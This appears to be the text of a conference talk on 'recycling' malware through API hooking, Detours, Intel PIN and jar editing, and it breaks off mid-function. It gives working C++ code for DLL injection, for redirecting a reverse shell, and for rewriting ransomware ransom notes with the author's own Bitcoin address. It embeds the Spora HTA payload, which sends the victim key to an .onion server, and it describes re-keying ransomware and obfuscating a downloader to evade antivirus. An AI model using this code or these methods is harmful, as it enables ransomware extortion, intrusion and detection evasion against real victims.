Recycling Malicious Code

By

Joe G
AKA
AverageJoe

Alternative Title Images

Recycle Someone else's code. Let them do the work.

Reuse Malware. Breed it new life.

Reduce Workload. Why re-invent the wheel?

What happens to malware when the C&C dies? What about when the threat actor is arrested? Dead?

It becomes useless. It has no purpose.

It CAN be used again!

But How?

  1. A debugger
  2. Hooking
  3. Detours
  4. Binary Instrumentation
  5. The Easy Way / Getting Lucky

We can do it a number of ways...

A Debugger?

The debugger is your friend. It has the power.

Full control over data is useful

Joe does rock, thank you.

Debugger is not portable

It's not like we can put the debugger on the target's machine and run along side to intercept functionality. That would be just plain silly.

Hooking?

The idea behind hooking is simple

Interception of program events at run time. For windows this can mean Window Messages (can of worms look it up), library calls, and function pointers. They achieve this through the use of inserting a jump instruction to a new location in memory that's executable. A 'trampoline' if you will that jumps back when done. Simple right?

There are many hooking suites. The most popularr ones are:

  • EasyHook
  • SubHook
  • MHook
  • PolyHook
  • Paradise
  • Frida

I chose EasyHook due to the name.

Let's play with MetaSploit

We're going to create an 'add-user' executable and change  its behavior...

I've tried to make it painless....

#include <easyhook.h>
using namespace std;
BOOL WINAPI BorrowWinExec()
{
	std::cout << "Replacing WinExec call!\r\n";
	return WinExec("mspaint",3); // max window
}
extern "C" void __declspec(dllexport) __stdcall 
NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo);
void __stdcall NativeInjectionEntryPoint(REMOTE_ENTRY_INFO* inRemoteInfo)
{
	HOOK_TRACE_INFO hHook = { NULL }; // keep track of our hook
	NTSTATUS result = LhInstallHook(GetProcAddress(GetModuleHandle(TEXT("kernel32")), 
"WinExec"),BorrowWinExec,NULL,&hHook);
	ULONG ACLEntries[1] = { 0 };
	LhSetExclusiveACL(ACLEntries, 1, &hHook);
	return;
}

Unfortunately EasyHook prefers a process ID to attach to when run. Easiest way to ensure this is to add a Sleep() call to our exe. Joe Hax inc...

DWORD processId;
std::cout << "Enter a process ID: \r\n";
std::cin >> processId;
WCHAR *wingmsg = L"This is filler data, don't care about sending it!";
WCHAR* dllToInject = L"justfuckingworkalready.dll";
std::wcout << "Attempting to inject: " << dllToInject << " \r\n";
NTSTATUS nt = RhInjectLibrary(
processId,   // The process to inject into
0,           // ThreadId to wake up upon injection
EASYHOOK_INJECT_DEFAULT,
dllToInject, // 32-bit
NULL,		 // 64-bit not provided
&wingmsg, // data to send to injected DLL entry point
64 // size of data to send (first 64 in this case)
);

Did I mention the power of a debugger?

Hooker Video

Detours

With detours, we can edit API calls like EasyHook, but more importantly halt on particular addresses. EasyHook won't let me :(

More Metasploit. Let's Redirect a reverse shell!

Local reverse shell that will connect to host 10.10.10.10 on port 802. Output to exe file.

What needs to be altered to redirect a reverse shell?

So...

  • Redirect call from old connect() function
  • initialize new socketaddr structure and fill it
  • call connect() again with filled modified structure
extern "C" int (WINAPI * Real_connect)(SOCKET, const struct sockaddr*, int) = connect;

int WINAPI Detour_connect(SOCKET s, const struct sockaddr* name, int namelen)
{
	struct sockaddr_in clientService;
	memset(&clientService, 0, sizeof(clientService));
	clientService.sin_family = AF_INET;
	clientService.sin_addr.s_addr = inet_addr("127.0.0.1");
	clientService.sin_port = htons(27015);
	memset(clientService.sin_zero, 0, sizeof(clientService.sin_zero));
	return Real_connect(s, (struct sockaddr*)&clientService, namelen); // detoured now!
}

In our code we set the address to localhost and the port to 27015, fill the struct and pass to connect().

Let's watch it work

Binary Instrumentation

Intel's PIN

A utility produced by intel that's cross platform and allows you to modify (or instruct) programs dynamically. Add functionality, debug, trace, or just plain mess with programs.

DynamoRio

The same concept as Intel's PIN

Just free and open source. And with shittier documentation and samples. Also cross platform.

 

For simplicity's sake I will be making use of PIN.

Let's play with file deletion.

I have a simple evil program. I want to instrument the program and have it not delete spacey.

#include <windows.h>
#include <stdio.h>
int main(void)
{
// omitted cactus for brevity
	WIN32_FIND_DATA fd;
	HANDLE hFind = FindFirstFile("kevin-spacey*", &fd);
	if (hFind != INVALID_HANDLE_VALUE)
	{
 	   do
  	  {
	printf("Deleting file %s \r\n",fd.cFileName);
        DeleteFile(fd.cFileName);
      } while (FindNextFile(hFind, &fd));
    FindClose(hFind);
	}
	printf("And gone!\r\n");
	getchar();
	return 9;
}

Teh Codez To Do So

#include "pin.H"
#include <iostream>
namespace WINDOWS
{
#include<Windows.h>
}
using namespace std;
typedef void (* ORIG_FILE_DEL)(char *);
BOOL DontDeleteEverything(ORIG_FILE_DEL orig_pte, char *dafile)
{
	cout << "I see a file to be deleted: " << dafile << endl;
	WINDOWS::Sleep(1000);
		
	if(strstr(dafile,"kevin-spacey") != NULL)
	{
	cout << "NOOOOOOO, LEAVE SPACEY ALONE! " << endl;
	orig_pte("nowayjose");
	return TRUE;
	}
	else{
	cout << "Whatever man... " << endl;
	orig_pte(dafile);	
	return FALSE;
	}
}

VOID ImageLoad( IMG img, VOID *v )
{
	RTN rtn = RTN_FindByName( img, "DeleteFileA" ); // A or W?
    if (RTN_Valid(rtn))
    {
        cout << "Replacing DeleteFile in " << IMG_Name(img) << endl;
        PROTO proto_delfile = PROTO_Allocate( PIN_PARG(BOOL), CALLINGSTD_DEFAULT,
		"DeleteFileA", PIN_PARG(char *), PIN_PARG_END() );
        RTN_ReplaceSignatureProbed(rtn, AFUNPTR(DontDeleteEverything), IARG_PROTOTYPE, 
		proto_delfile, IARG_ORIG_FUNCPTR, 
IARG_FUNCARG_ENTRYPOINT_VALUE, 0, IARG_END);
		PROTO_Free( proto_delfile );
    }
}

INT32 Usage()
{
    cerr << "This tool ensures that file deletion never deletes everything." << endl;
    cerr << endl << KNOB_BASE::StringKnobSummary() << endl;
    return -1;
}

int main( INT32 argc, CHAR *argv[] )
{
    PIN_InitSymbols();
    if (PIN_Init(argc, argv)) return Usage();
    IMG_AddInstrumentFunction( ImageLoad, 0 );
    PIN_StartProgramProbed();
    return 0;
}

Does it work? You bet you ass it does!

What's not to like about PIN? It makes everything HUGE. 4 MB for a DLL file plus another 16 MB for the launcher.  EasyHook only clocks in at 427kb (launcher + dll). Detours is tiny at a 136kb all included.  Size matters.

Getting Lucky

Sometimes I get lucky

Sometimes people code their malware in java, .net, or python.

Sometimes they don't even PACK or ENCRYPT the thing.

Take this jar file for example

File is a downloader and not well liked it seems.

Mobile code makes it easy

File downloads from http://191.252.2.93 and opens a zip file and then executes the stuff within.

Editing a jar file isn't hard.

There exist many free editors for the jar file of varying degrees of usefulness.

Since the 'jar file' is basically just an lzma archive with '.class' files inside, its trivial to remove classes.

The best one is DirtyJoe.

Hits close to home.

Honorable Mention is Class Editor.

I am able to easily edit what I want with DirtyJoe

DirtyJoe even has a raw bytecode editor for if you're HARDCORE

Class Editor is meh.

After changing the URI, many AV's were baffled.

We can further confuse the AV's by adding obfuscation. Many free obfuscators exist for java.

I used ProGuard and got the detection lower.

More Hax to be done include modifying the manifest file, the names of classes, variable names, and more.

It is much easier to do this via eclipse and compiling to a jar file.

Much Better

AND NOW...

Let's Recycle A Crypto Locker!

Grabbed this one off of VT Spora Ransomware

The other one, grabbed from friend at bank. Nameless.

Step 1 is run and see what happens. This one was run on XP. Text file.

Same one run on win7. MessageBox and Text File.

Here's the Spora one on XP. It writes an HTA file (html app). This also has javascript code.

Contents of Spora HTA file

Of particular note is at the bottom. Javascript calling home with the key file TOR.

Text is Russian. Thank you Google.

Your computer has been blocked using the Spora virus. There was a connection problem! <br> <br> To recover, write to the mail: [email protected] Or, try to connect again after 1 hour by restarting the computer

 

Both programs make use of wincrypt functions and both programs write to disk the final message displaying demands / BTC.

To recycle this malware, we need only hook the WriteFile API, search the contents of the data being written, replace that data with our own. Put our BTC address and email inside.

What about the crypto Joe? What about it? I'm lazy.

"A real black hat wouldn't even bother decrypting files..." - Nak

If you really wanna know, here's how I would do it...

  1. Find CryptImportPublicKeyInfo() function and hook it
  2. Define my own CERT_PUBLIC_KEY_INFO structure with my own public key
  3. call the original CryptImportPublicKeyInfo() function with my custom structure.
  4. Run everything else like normal.

This would make all encryption done only unlock-able with MY private key.

Only Spora used public key encryption. The other one however...does NOTHING. Spook!

The 'crypto' is just MD5 hashing with no data passed.

I'm using detours  to replace data in WriteFile...

#include "stdafx.h"
#include <windows.h>
#include <detours.h>
#include <cstring>
#include <string>
#include <Shlwapi.h>
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "detours.lib")


extern "C" BOOL (WINAPI * Real_Write_File)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED) = WriteFile;

BOOL WINAPI Detour_WriteFile(HANDLE passedhandle, LPCVOID lpBuffer, 
	DWORD numbytes2write, LPDWORD numbyteswritten, LPOVERLAPPED lpOverlapped)
{
	TCHAR buf[MAX_PATH + 1];
	DWORD sz = GetFinalPathNameByHandle(passedhandle, buf, MAX_PATH, 0);
	buf[sz] = 0;
	WCHAR *pathfilename = PathFindFileName(buf);
	
	if (wcscmp(pathfilename, L"HOW TO DECRYPT FILES.txt") == 0)
	{
		char *screw = 
		"Attention! All your files are belong \r\n"
		"to us! If you want these files back,\r\n"
		"send 1 BTC to the address:\r\n"
		"1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR\r\n"
		"then send an email to\r\n"
		"[email protected] with the subject:\r\n"
		"CactusCon 2017\r\n"
		"Then I'll send the decryption key.\r\n"
		"              \r\n"
		"      /|\\\r\n"
		"     |||||\r\n"
		"     |||||\r\n"
		" /\\  |||||\r\n"
		"|||| |||||\r\n"
		"|||| |||||  /\\\r\n"
		"|||| ||||| ||||\r\n"
		" \\|`-'|||| ||||\r\n"
		"  \\__ |||| ||||\r\n"
		"     ||||`-'|||\r\n"
		"     |||| ___/\r\n"
		"     |||||\r\n"
		"     |||||\r\n"
		"-----------------\r\n";
		
		return Real_Write_File(passedhandle, screw, strlen(screw), numbyteswritten, lpOverlapped);
	}
	
	WCHAR *exten = PathFindExtension(buf);
	if (wcscmp(exten,L".hta") == 0)
	{
		
		char *me = "<hta:application showInTaskbar=\"no\" innerBorder=\"no\" navigable=\"no\" scroll=\"no\" border=\"none\" caption=\"none\"><html><body><script language='JScript'>t = new ActiveXObject('WScript.Shell').ExpandEnvironmentStrings('%temp%');f = new ActiveXObject('Scripting.FileSystemObject');c = new ActiveXObject('ADODB.Stream');if(!f.FileExists(t+'\\icon_2.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAMAAADXqc3KAAABp1BMVEVMaXHyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgDyqgD////yqwDyqQDxpQDxpgDyqADxpADwngDxogD//fn//vzyrAH3zGf63Zr64qf868L87MX87sr++e7++u///v3///7xoQDypwDyqwHyqwLyrADyrALyrAPyrQXyrQrzrgXzrgbzrwbzrwfzrwjzsRDzsBjzshP0tBn0tCH0tR70tiH0uCT0tyz0uCf0uCj1vDT1vjj1vT71vzz1v0n1wUL1wUb2wkX2w0r2x1X3yFj3yVz3y2f3zGX3zGb3zmv40G/40HT40XP40Xb40Xf40Xj40nj51YL514j52Iv52Y3525L63Zn635/636D64qb746r75rX757b87MT87Mb87cj8787978/979D979L98NP98df99eH++Ov++vL++/P+/PT//PX//Pb//Pf//vslsX0oAAAAKHRSTlMAAQMjJCUmKitcXV5fdXZ8fYGCnp+io6TDxMbH7O7v8PHy9fb7/P3+2lfZUwAAAZhJREFUKM9FktV2G0EQRFurxFYMUZzYSUwyaWduz4IoZgozMzMzMzN9dB52FPdj1zndp+qWiIgEOSms7i9ZM9jXVZBcIH4Cya8dwwJYxtYtk6C5bxvGGmNx1hjLSEemBNKJCS2QVqIIGxpWSiASSDuhgYj06P2dGxyYkA4JRFqGMMCmrdV7P/e9vx47DEMtItJNGVz8YO7xl6mTejreAmW6RVpHsODSc9M6v6CNm5tTh2WkVYoYAFc71tCJyR/68WDqMKyS9V6Ix3V2f+3UrD6NHYZeGcicufiZvkkrO77qy8RhGZAy2bhPWv88+UH/XEwcEHrBJUd+68Tz76oPKw6g7E9F2y7pr0O1XS+0fsaf6sVAtPf1W51JNlbPqt6qZM+LGFx8TRv67dGVy+9ULyQOQ9Eb3HP87t+5BdV5fQWZQVlDGVg8ryemZ+48Gd8e+UhkeQmDS25MHahfrSZxhA8xkDaMAdzu24cjH3t7BsSDiioRYENDZxOhR+sywMMrlqDne0abZRjtyctSTXJS6OobNKbU/78+/wBwgVrMmlG5mwAAAABJRU5ErkJggg==';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_2.png', 2),c.close();}if(!f.FileExists(t+'\\icon_3.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAMAAABg3Am1AAAChVBMVEVMaXFJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4ZJX4VJX4VJX4VJX4VJX4VJX4VJX4VJXoVJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJYIVJX4ZJX4VJX4VKX4VJX4VJX4VJX4VJX4VJX4VHYIVJX4VJX4VJX4VJX4VJX4VJX4VJX4VHX4VJX4VJXoVJX4VHX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VJX4VKYIVHX4VJX4VJXoVJX4VJX4UVqfBJX4VHXoRLYYhBWH0XICwVe64Vpu0Vs/9MYodAWIEVqO8UqvJgcpHy9fYcrvQDK0psb3ZKYIUVtP9JX4RJXoRLYYlFXYNAV3wUIS5BWn0VsPwVeawVp+4+Vn8arPNKX4VKYIZKYIcVqvEXHysVXYEVgrQVo+kXHywVgrIWvv9MYoZAV4BfcpNKYYhGXYM/V4Dy9fVgcpLy9vcarfNidZVscXcHMk9cX2bg4eFkd5dgc5Jkd5aJlq7e39/o6ur19fIHM09TVl1UWF4FME1AWH1PZIo9VIAVqe8UqfIVeq4VHyvx8vGGkqVFXYAVpewVs/4cJTEwSW8Ue67y9PVrd4AcuP0DFCcDLEobq/ECIz0bgK5rc3kDLk1sb3cUp+9sbnUDK0kcrvVAV4FFXIMlOVIkOVK1vchEXIO1vMhvqanaAAAAbXRSTlMABPoCA/sB/fz+7LhgJAX555gJNg7B8/ICxJpy7pcBmSvjIsDLaSr4VGNYa2+/DOsD6eoL8Cff4XYm294KLOW+cCpXf/EDDvR9Ae0PZlZ6A2VVWS80MXgjdQMlIcJiLrkjdO/klJORAQRxCbZefx9iKwAAA3BJREFUSMeVlmV721AMhY9jx9dOU4YV165jZoaOmZmZQSluawdJGcfMzMzMzLzfs8eQzkmctHk/+To6jyTrRhJggOcaIirNnpjQPS48PK57QqI9LQoNOR7m8PEievYIsZEBW0iPnhDjTSUCj5kpEUQkSUxWjGUmSUQUERkKXvC15xAzqAHJViszemBWq0yDhw8F52UuCohuQkzysNY1EqMm0RBED/swtLKRJJMpskS2gQgTPeJpaiEL+cUiW5oao+LRWmaMAsCY3Bq1mQuYKMkyBUSWpVZuBYfokSRRHUjUaYoWlYhRCWSlOrFQbAyUxDtgrJ5vocMPhbpiuhIUj67JpCXgLM40pXirlgZ1mg8eHFL1gLYVlZZnmVBeWrRNT2MplgNdF5HyRQudRb/KdmSbsKPsZ9FWJSpGjUIBLNAcOIpLy3buqszxoXLXzrLSYodiY6UkoPM8XZBZvmfvvgpXnheuin1795Rn6oKQPpi7UEvZkZmVXVmxuyrXi6rdFZXZWZqAUXJfzNFrpghyXFXb13ixvcqV4xaQRHYkGgV5uWt8yM0zClIxm1j9BYwao5tetXoJZOqNYfpVqZeAqAGk4ARS8IK4YEMKOunGwX7WVEPh7j15fGe9F3ceP7lnKFwK7G7BoZv3n7s+59/N9+Bu/mfX8/s3D7kFq9E3WYvJcevR0/ev3n7bqHCipqam5oT6+O3tq/dPH93SL58tDX1CtOt9+Paz1+8+fn2zSeHG1dOnr95QH998/fju9bPbh7XrvWolkKQKHPsvPnz54cunzQqnzly7fv3amVPq4dOXDy8fXtzvUAUrAIQ2UmMq+XvlwYsNKkePX7509uyly8ePaucXD678Lqn9i3JIUVw4S/4cPF+gcazg5LkLF86dLDimvzh/8EeJU3GwGBx4hLZXareF1h1Y5+ZIdXV19ZHa44HvtEWpWsdZiAdmYKrayJxrA+BUG1mS2l1FxMQGavX/W2XbdmqrBIfJtvo0446T3O1bwJjwutt9+ATjgBjNWEAfEmPjMc44slo2DziyqHlLz0EahhYRZPU3FK0U0QJhHmN3hIBmsf7HbttmXmNXzaNdG5v5YG/fpjNMVgGhA9KX9PNdHfpFTsMQwWzZEAUR6f29l5P+6eoPfvYZYRmiBtgjM3p1keUuvTIi7QN81p9/3AT9SNQC/WYAAAAASUVORK5CYII=';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_3.png', 2),c.close();}if(!f.FileExists(t+'\\icon_4.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_4.png', 2),c.close();}if(!f.FileExists(t+'\\icon_5.png')){b = new ActiveXObject('MSXML2.DOMDocument').createElement('r');b.text='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';b.dataType='bin.base64';c.type=1,c.open(),c.write(b.nodeTypedValue),c.saveToFile(t+'\\icon_5.png', 2),c.close();}</script><script>window.resizeTo(screen.availWidth*0.95,screen.availHeight*0.95);window.moveTo(screen.availWidth*0.025,screen.availHeight*0.025);r=\"<center><br><br><h1>You have been owned by AverageJoe</h1><br><br><h2> CactusCon 2017 baby!</h2><br><br><h3>oh and pay me BTC. Send them to 1LmQSUfu3KPCLhj26Y4RJVci3FNum51YSR and email [email protected] when done</h3><center>\";d=\"http://5pr6hirtlfan3j76.onion/\";try{h=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");h.setProxy(2,\"31.192.105.180:8123\",0);h.setTimeouts(10000,10000,60000,60000);h.open(\"POST\",d+\"?\"+Math.random(),0);h.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");h.send('key=CJVoUrir+SMkXSleyRFjHwiS7ybB+aKsEqQcziA4JLmaEEzSw5fauIcNcMUI28TCEQzlPVJYY+lBSj+YZFdaouPeiNC+wUqtHpTmMyCsaNiHGPDFNZ7KMxy2yo6QZ5kzFQIVLwYFJsBJ/S+KkZX1Ysb/cWzgS5tx6X0V1SYIOdPq9LhSrvGsls726titSXFidIgfC2OmBLrupIGKWGebpCQpJl4bJF+U4sBr6d/wEsSoWw/R+AvQb3B9cPuKGeNI4x+0JLhTPKlxUDzvIO96yjWfxNL63uXDZtgxhiHm/Exv0r4pAtYFqwG9IrqUXI5dUnqTWCX5eQTjWxKR/Nmff+jgmaCysEcgPhkG/Kwqat/UO6uRM7TFTNyEpPsohKKeCCIo/C1KdVvs57xglXcrUYlS8okxmaEyZm+XVJLFXVxNTXZJQd6nGZyF7NjDiyzd5eoiGbuhD9GMZ0sY1yLzy8rAItUCG1DcsuWWid/uJc/RQr0Wt9/jEnIcYp0KGFE7k9AYlYcxiG8WsQ9k+6xhxg2d3EV98j32H90V6r3CxS9Rsbep5+Rikj0cGOewScHxP1lGaLJqX8dwx5VcfewBPxx+ml5oyLqRx47trcwZG2os+QYcp1LZco8kDIXf8UrBqhcSO06rRUwBnF1SCjMyTU39XgHI2VqxCQhMK6Tv46amiH6zVEBRuH4/n5fiGkFGdoSrzROt0DzTy8+J5ZQgQy53WN+JK+Uxh/+HYowrb/qjANO716mpXeu8X8QdcEav5dIzo5ymmCWbGoyFDEdY0d8jkLXmcGWamlX1Eq4zKWrzVT2Kq79bLyjGFhgZXD+ynkdalkuelM9MC3SlfLjYqlqhMjmFA6sURtywB/0OXdohNCQdNIpPj4hvYvx4G8eZqmrdbiEzvCBNRvcRl5hpSoZ2+D0xRsPrxuABWUO8FmpVfph7GodJkLd9rP+PzW0EMYeLzoX6PjfGmRMPjJuOn3nzt2Uu3I0doXbhT4AJ+xT04aFwuBgd2xN7NOyIVHzmX85Fjjv0VNidRy4sKHmrhUQI66wYUX2kacEMF/FsTw0iHl0QshVVoMgpxV4/3hTMorq65VhD3JgmJwJdI94y3unMvrKumE86wHo9NHk6Uyn5e07IvjfianmAi4lTFct7FpygcM14eSE4o6dXx6PPQ9mRIF2AHcEP4mKH+1qzjgS9t9kTf1MY9zvog9i4C27RvaA/oFJggPRCaPzGqextSxI9XWuRGOqe0aEcgR6ZWRMNYty4NhqJPTRHKVA8Yi0i');document.write(h.responseText);}catch(e){document.write(r);}</script></body></html><div style='height:0;display:none'>";
		return Real_Write_File(passedhandle, me, strlen(me), numbyteswritten, lpOverlapped);
	}
	return Real_Write_File(passedhandle, lpBuffer, numbytes2write, numbyteswritten, lpOverlapped);
}



extern "C" __declspec(dllexport) void DoNothingAlready(void)
{
	DWORD ayylmao = 20345;
	_asm
	{
		xor eax, eax
			xor ecx, ecx
			mov eax, ayylmao
			mov ecx, 0
		testd:
		mov edx,234
		xchg edx,ebx
		xor ebx,ebx
			inc ecx
			cmp eax, ecx
			jnz testd
			pop ebx
			nop
	}
	return;
}

BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved)
{
	if (DetourIsHelperProcess()) {
		return TRUE;
	}

